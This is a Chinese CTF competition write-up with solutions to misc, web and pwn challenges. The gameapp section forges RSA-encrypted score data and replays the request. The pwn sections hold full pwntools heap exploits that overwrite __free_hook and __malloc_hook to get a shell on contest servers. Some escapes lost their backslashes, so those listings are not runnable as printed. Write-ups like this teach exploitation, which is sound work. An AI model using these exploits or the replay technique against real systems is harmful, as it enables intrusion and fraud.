'数字安全'云安全公测大赛 Write-Up
-
misc
-
签到
-
ewm
-
findme
-
web
-
gameapp
-
Pwn
-
amazon
-
fkroman
Misc
02
签到
签到题直接给了flag
02
ewm
-
solved by 0xPoker
讨论区:
…好像就是一个二维码拼接一下
拼完了,逆向真难顶
flag{g00d_g00d_study_1jf8988}
03
findme
-
solved by r1ngs
脚本如下:
二分查找法
#-*- coding=utf-8 -*-
from socket import *
import string
from re import *
def connect(host, port):
    """Open a TCP connection to ``host``:``port`` and hand back the connected socket.

    The caller owns the socket and is responsible for closing it.
    """
    conn = socket()
    conn.connect((host, port))
    return conn
def i2h(num):
    """Return the hex digits of ``num`` with no ``0x`` prefix.

    Python 2 appends ``L`` to ``hex()`` of a long; that suffix is removed so
    the server only ever sees digits.
    """
    text = hex(num)
    digits = text[2:]
    return digits.rstrip('L')
def send(s, num):
    """Read the server's pending output, then send ``num`` as bare hex digits.

    Both the received prompt and the digits being sent are echoed so the
    exchange can be followed on the console.  Python 2 script: ``send``
    writes a ``str`` directly.
    """
    prompt = s.recv(1024)
    print(prompt)
    digits = i2h(num)
    print(digits)
    s.send(digits)
def get_flag(s, bottom, top, g1, g2, count):
    """Final probing once the search window ``[g1, g2]`` is narrower than ten.

    Runs ``count`` rounds; each round resends ``bottom`` and ``top``, moves
    ``g1`` forward by ``count``, sends that value twice and prints the reply.
    ``g2`` is accepted but never read (kept for the call site in ``main``).
    """
    for _ in range(count):
        print('======= try to get flag ========')
        send(s, bottom)
        send(s, top)
        g1 += count
        send(s, g1)
        send(s, g1)
        print(s.recv(1024))
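def main():
    """Interval search for the hidden 128-bit number on the remote guess server.

    Python 2 script (print statements, integer ``/``); ``//`` is used below
    so the arithmetic stays integral on Python 3 as well.  Each round sends
    ``bottom``, ``top``, ``g1`` and ``g2`` and reads one reply: the author's
    ``#in`` note marks ``'1\\n'`` as "target inside [g1, g2]", after which
    the upper probe is pulled down to the midpoint; ``'2\\n'`` means it is
    not, and the window either advances by ``block`` (no hit yet) or reopens
    the other half of the last hit.  When the window is under ten wide,
    ``get_flag`` finishes the job.  The socket is closed on every exit path.
    """
    host = '121.40.216.20'
    port = 9999
    s = connect(host, port)
    try:
        bottom = 0
        top = 2 ** 128
        block = abs(top - bottom) // 3 + 1  # integer division (Python 2 '/' semantics)
        g1 = bottom
        g2 = block
        flag = 0      # 1 once the server has answered "in" at least once
        tg2 = g2      # upper bound of the last "in" window
        tmid = None   # midpoint of that window; only read when flag == 1
        for attempt in range(200):
            if abs(g1 - g2) < 10:
                get_flag(s, bottom, top, g1, g2, abs(g1 - g2))
            send(s, bottom)
            send(s, top)
            send(s, g1)
            send(s, g2)
            mid = (g1 + g2) // 2
            remess = s.recv(1024)
            # NOTE(review): the published listing prints these literals as
            # '1n' / '2n'; the backslash was dropped in extraction (the same
            # page shows 'x00' where '\x00' is meant), so they are restored
            # here as newline-terminated replies — confirm against the server.
            if remess == '1\n':  # in
                print(1)
                flag = 1
                tg2 = g2
                tmid = mid
                g2 = mid
            elif remess == '2\n':
                print(2)
                if flag == 1:
                    g1 = tmid
                    g2 = tg2
                else:
                    g1 = g2
                    g2 += block
            else:
                print(remess)
            print('count' + str(attempt))
            print('+' * 50)
    finally:
        s.close()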
# Script entry point: the whole exchange with the server lives in main().
if __name__ == "__main__":
    main()
flag : flag{flag_server_boomboom_guess}
WEB
01
gameapp
-
solved by evoA
我的伪造Java脚本
import org.junit.Test;
import org.springframework.util.Base64Utils;
import sun.misc.BASE64Decoder;
import javax.crypto.Cipher;
import java.security.Key;
import java.security.KeyFactory;
import java.security.interfaces.RSAPrivateKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
/**
 * Builds the request body used in the gameapp write-up: a JSON score update is
 * run through {@code RSA/ECB/PKCS1Padding} in ENCRYPT mode with the private key
 * held at {@code keyMap} slot 1, and the result is printed Base64-encoded.
 *
 * NOTE(review): the private key is held by the client (the write-up attributes
 * the scheme to the app's GameView.java), so the server cannot treat this blob
 * as proof of origin — a client-side secret has to be assumed public.  A
 * private-key "encrypt" with PKCS#1 v1.5 is also not a real signature scheme
 * (no hash, no PSS).  Integrity needs a key the client never holds, a proper
 * signature, and a server-issued nonce or session binding inside the signed
 * payload so a captured blob cannot simply be resent.
 */
public class Test001 {
    /** Key strings by slot: 0 looks like an RSA public key and is never read
     *  here; 1 is the Base64 PKCS#8 private key, elided from the published page. */
    private static Map<Integer, String> keyMap = new HashMap();

    /** Empty placeholder test. */
    @Test
    public void test001(){
    }

    /**
     * Encrypts {@code paramString} with the slot-1 private key and prints the
     * Base64 result to stdout.
     *
     * @throws Exception from key parsing or the cipher, propagated unchanged
     */
    @Test
    public void private_encrypt()
    throws Exception
    {
        // As printed the inner quotes are unescaped (backslashes lost in
        // extraction); the compilable literal is "{\"op\":\"add\",\"score\":999}".
        String paramString = "{"op":"add","score":999}";
        // String paramString = "{"player":"evoA"}";
        keyMap.put(Integer.valueOf(0), "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYnImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8anYFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEnA3Hau/DTzW4g4xhvzQIDAQAB");
        keyMap.put(Integer.valueOf(1), "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");
        // Decode the PKCS#8 blob (Tomcat's Base64 helper) and rebuild the private key.
        Object localObject = org.apache.tomcat.util.codec.binary.Base64.decodeBase64((String)keyMap.get(Integer.valueOf(1)));
        localObject = (RSAPrivateKey) KeyFactory.getInstance("RSA").generatePrivate(new PKCS8EncodedKeySpec((byte[])localObject));
        Cipher localCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding");
        // 1 == Cipher.ENCRYPT_MODE; the named constant would read better.
        localCipher.init(1, (Key)localObject);
        byte[] res = Base64.getEncoder().encode(localCipher.doFinal(paramString.getBytes("UTF-8")));
        System.out.println(new String(res));
    }
}
pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Maven build for the Test001 harness above.  The Spring Boot starter parent
     pins dependency versions; JUnit 4 runs the @Test methods and json-lib is
     only on the test classpath.
     NOTE(review): 2.0.4.RELEASE is an old Spring Boot line that is no longer
     maintained — re-check current advisories before reusing this pom beyond
     the write-up. -->
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>me.evoA.springboot001</groupId>
    <artifactId>springboot001</artifactId>
    <version>1.0-SNAPSHOT</version>
    <!-- Pin the Spring Boot version: 2.0.4.RELEASE -->
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.0.4.RELEASE</version>
    </parent>
    <dependencies>
        <!-- Pull in the jars Spring Boot web needs (the Tomcat Base64 helper
             used in Test001 presumably comes from here). -->
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <!-- JUnit 4: provides the @Test annotation used by Test001. -->
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>test</scope>
        </dependency>
        <!-- json-lib: test scope only; not referenced by the class shown. -->
        <dependency>
            <groupId>net.sf.json-lib</groupId>
            <artifactId>json-lib</artifactId>
            <version>2.4</version>
            <scope>test</scope>
        </dependency>
    </dependencies>
</project>
PS: Content-Type必须是xxx 否则会失败
感觉题目要99999分
com/ispring/gameplane/game/GameView.java 有个 addScore 方法，json 数据经 RSA 加密后发送，已经可以伪造。直接加 999 会被 check，加 99 可以通过
注意发一次替换一次cookie
替换cookie 就好了
import requests
# Replay client from the write-up: the pre-built score blob is posted once with
# the session cookie, then 1000 more times on the same session (the cookie set
# by each response is carried forward by requests.Session).
# NOTE(review): the identical blob is accepted on every request — binding a
# server-issued nonce or the session id into the signed payload would let the
# server reject such resends.
SCORE_URL = "http://121.40.219.183:9999/score/"
SIGNED_SCORE = "TWmIYQfp60aWjJH9kWjSB+OgWmyqiJJaGakyS1YXHcdpVzQVLoxC2/DBgFs19HGU8suk9togBAjGpM4KOvDbSh/yL+VEtg9LzSmaWdvMV6KM6NsXLKXdHhhDHwP/iOm1ceAkV9qBvs6jaPu4Luy1DxsF1FOynJFBAdAUpT+EQN0="
rrr = requests.Session()
res = rrr.post(
    url=SCORE_URL,
    data=SIGNED_SCORE,
    headers={
        "Content-Type": "xxx",
        "cookie": "session=eyJwbGF5ZXIiOiJldm9BIiwic2NvcmUiOjQwMH0.XYRtdg.Y98UCi-ehTiQawFO2wclehVegVE",
    },
)
for _ in range(1000):
    res = rrr.post(url=SCORE_URL, data=SIGNED_SCORE, headers={"Content-Type": "xxx"})
    print(res.text)
Pwn
01
amazon
-
solved by 骑麦兜看落日
利用 unsortedbin 合并然后利用 unsortedbin overlap 修改 tcache 表的 fd 位
修改 free_hook
为 system
覆盖 free_hook
使向上申请 覆盖 锁 为0
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
# pwntools setup for the local/remote session created in __main__.
context(log_level="debug", arch="amd64")
exe = './amazon'
elf = ELF(exe)
# Offsets noted by the author; pwn() below does not read this list.
one = [0x4f2c5, 0x4f322, 0x10a38c]
#------------------------------------
def d(s=''):
    """Attach gdb to the running target ``p``, optionally with a gdb script."""
    gdb.attach(p, gdbscript=s)
def manu(idx):
    """Answer the main-menu prompt with option ``idx``."""
    option = str(idx)
    p.sendlineafter('choice: ', option)
def add(num, size, note):
    """Menu 1: buy item 1, then answer the quantity, note-size and note prompts.

    ``note`` is written with ``send`` (no trailing newline).
    """
    manu(1)
    for prompt, answer in (('buy: ', 1), ('many: ', num), ('note: ', size)):
        p.sendlineafter(prompt, str(answer))
    p.send(note)
def add1(num, size, note):
    """Like ``add`` but only waits for the first prompt; the rest is sent blind.

    Unlike ``add`` the note is sent with ``sendline``.
    """
    manu(1)
    p.sendlineafter('buy: ', str(1))
    for line in (str(num), str(size), note):
        p.sendline(line)
def show():
    """Menu 2: print the current state; nothing further is sent."""
    return manu(2)
def checkout(idx):
    """Menu 3: check out entry ``idx``."""
    manu(3)
    entry = str(idx)
    p.sendlineafter('for: ', entry)
def pwn():
    r"""Interaction sequence recorded in the write-up against the `amazon` menu.

    Drives the helpers above on the module-level connection ``p`` and sets
    ``libc.address`` (``libc`` is created in ``__main__``) from the six bytes
    ``show`` prints after 'Name: '; ends by handing the connection to the user.
    NOTE(review): the published listing has the backslash stripped from its
    escapes ('x00' / 'xff' stand for '\x00' / '\xff'); as printed,
    ``ljust(8, 'x00')`` would raise because the fill must be one character,
    so this listing is not runnable verbatim.
    """
    add(2, 0x80, 'a') #0
    add(2, 0xa0, 'A') #1
    add(2, 0x90, 'A') #2
    add(2, 0x10, 'A') #4
    for i in range(8):
        checkout(0)
    for i in range(8):
        checkout(2)
    show()
    p.recvuntil('Name: ')
    libc.address = u64(p.recv(6).ljust(8, 'x00')) - 0x3ebca0
    success('libc.address--->'+hex(libc.address))
    for i in range(8):
        checkout(1)
    add(2, 0x100, 'xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__free_hook']-0x40))
    checkout(0)
    add(2, 0xa0, 'a')
    add(2, 0x100, 'xff'*0x80 +p64(3)+p64(0xa1) + '/bin/shx00')
    add(2, 0xa0, 'x00'*0x20+p64(libc.sym['system']))
    #d()
    checkout(5)
    p.interactive()
#-------------------------------------
if __name__ == '__main__':
    # l != 0: run ./amazon locally against the system libc; l == 0 (as shipped):
    # connect to the remote target and use the bundled libc-2.27.so.
    l = 0
    if not l:
        p = remote('121.41.38.38', 9999)
        libc = ELF('libc-2.27.so')
    else:
        p = process(exe)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    pwn()
02
fkroman
-
solved by 骑麦兜看落日
程序存在一个UAF和heap overflow,先通过fastbin attack打iofile leak出libc地址,然后再通过fastbin attack打malloc_hook来getshell
#!/usr/bin/env python2
from pwn import *
# pwntools setup; io (the connection) is created in __main__.
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
exe, lib = './fkroman', './libc-2.23.so'
ip, port = '121.40.246.48', 9999
elf = ELF(exe)
libc = ELF(lib)
def dbg(script=''):
    """Attach gdb to the live connection ``io``, optionally running ``script``."""
    return attach(io, gdbscript=script)
def choice(idx):
    """Answer the 'Your choice: ' menu prompt with ``idx``."""
    option = str(idx)
    io.sendlineafter('Your choice: ', option)
def index(idx):
    """Answer the 'Index: ' prompt with ``idx``."""
    slot = str(idx)
    io.sendlineafter('Index: ', slot)
def add(idx, size):
    """Menu 1: allocate slot ``idx`` with the given ``size``."""
    choice(1)
    index(idx)
    length = str(size)
    io.sendlineafter('Size: ', length)
def dele(idx):
    """Menu 3: delete slot ``idx``."""
    choice(3)
    return index(idx)
def edit(idx, size, content):
    """Menu 4: rewrite slot ``idx`` with ``size`` bytes of ``content``.

    ``content`` goes out with ``sendafter`` — no newline is appended.
    """
    choice(4)
    index(idx)
    length = str(size)
    io.sendlineafter('Size: ', length)
    io.sendafter('Content: ', content)
# ------------------------------------------------
# Run mode: non-zero starts the binary locally, zero connects to ip:port (see __main__).
LOCAL = 0
# Author's constants; they appear to be specific to ./libc-2.23.so (lib above).
iofile_off, libc_off = 0x25dd, 0x3c5600
onegadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]  # exp() reads index 1
# ------------------------------------------------
def exp():
    r"""Interaction sequence recorded in the write-up against the `fkroman` menu.

    Drives the helpers above on the module-level ``io`` (opened in
    ``__main__``), sets ``libc.address`` from eight bytes read after skipping
    0x40 (offset ``libc_off``), and ends by handing the connection to the
    user.  The constants ``iofile_off``/``libc_off``/``onegadgets`` are the
    author's and appear to be specific to ``./libc-2.23.so``.
    NOTE(review): the trailing 'x00' in the first ``edit(6, ...)`` call is an
    escape with the backslash dropped in extraction ('\x00' is meant, as
    elsewhere on this page); the listing is not runnable verbatim.
    """
    add(0, 0x70-8)
    add(1, 0x70-8)
    add(2, 0x90-8)
    add(3, 0x20-8)
    #-------------------leak libc---------------------
    dele(1)
    dele(0)
    dele(2)
    edit(0, 1, p8(0xe0))
    edit(1, 0x70, 'A'*0x68+p64(0x71))
    edit(2, 2, p16(iofile_off))
    add(4, 0x70-8)
    add(5, 0x70-8)
    add(6, 0x70-8)
    edit(6, 0x54, 'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+'x00')
    io.recv(0x40)
    libc.address = u64(io.recv(8)) - libc_off
    log.info(hex(libc.address))
    #-------------------malloc_hook-------------------
    add(7, 0x70-8)
    edit(7, 0x70, 'B'*0x68+p64(0x21))
    dele(7)
    edit(7, 8, p64(libc.sym['__malloc_hook']-0x23))
    add(8, 0x70-8)
    add(9, 0x70-8)
    edit(9, 0x1b, 'C'*0x13+p64(libc.address+onegadgets[1]))
    add(8, 0)
    #dbg()
    io.interactive()
# ------------------------------------------------
if __name__ == '__main__':
    # LOCAL selects a local process (the env override stays disabled, as in
    # the original) versus the remote target at ip:port.
    if not LOCAL:
        io = remote(ip, port)
    else:
        io = elf.process()#env={"LD_PRELOAD": libc.path})
    exp()
原文始发于微信公众号(三叶草小组Syclover):'数字安全'云安全公测大赛 Write-Up